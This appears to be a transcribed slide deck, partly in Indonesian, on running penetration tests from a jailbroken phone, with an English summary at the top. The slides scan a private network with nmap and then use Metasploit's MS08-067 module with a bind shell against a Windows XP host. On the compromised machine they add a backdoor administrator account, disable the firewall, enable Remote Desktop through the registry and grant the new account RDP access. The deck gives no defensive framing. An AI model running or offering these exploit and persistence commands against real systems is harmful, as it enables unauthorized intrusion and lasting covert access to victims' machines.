This document discusses using mobile devices to conduct penetration tests on networks. It describes using tools like StumblerPlus, iWep PRO, iNet, and Snap to discover hosts and scan for open ports. Nmap is recommended for deeper profiling like OS detection. The Metasploit Framework is presented as an easy way to leverage exploits with its pre-built modules. The document provides an example usage of Metasploit to exploit the MS08_067 vulnerability on a Windows host and gain administrative access. It concludes with suggestions to disable the firewall and enable remote desktop access on the target system.

1. {network security part 1}
Penetration test sederhana dengan mobile device...
http://www.flickr.com/photos/32615508@N02/3047982712

2. {network scan}
Host discovery, find the targets

3. StumblerPlus , iWep PRO

4. iNet , Snap:
Mobile version of pinger/scanner (ex: Angry IP Scanner)

5. {deeper profiling}
Port scanning, OS detection etc.

6. Nmap 5.00
Jailbroken iPhone etc.
$> nmap -O 192.168.5.44
Aha, microsoft-ds (port 445)
plus XP SP2...

7. Or else...
$> nmap -p 445 192.168.5.0/24

8. {penetrations}
Using exploits etc.

9. Metasploit Framework
$> msfconsole
Easy, many modules, reular
updates, Ruby, can run nmap too.

10. Use Proper Modules
$> use windows/smb/ms08_067_netapi
$> show options
$> show payloads
Security knowledge & deduction

11. Set Options
$> set payload windows/shell_bind_tcp
$> set rhost 192.168.5.44
$> exploit

12. Welcome to C: Prompt
$> ipconfig
$> dir
$> net user
$> net user guestboss guestboss /add
$> net localgroup Administrators /add guestboss
$> echo “P4wned!” > "c:Documents and
SettingsguestbossDesktopHello.txt"

13. Shutdown Firewalll & Enable RDP
$> set opmode mode = DISABLE exceptions = ENABLE
$> reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal
Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
$> net localgroup "Remote Desktop Users" /add guestboss

14. {conclusions?}
..............................

15. Q&A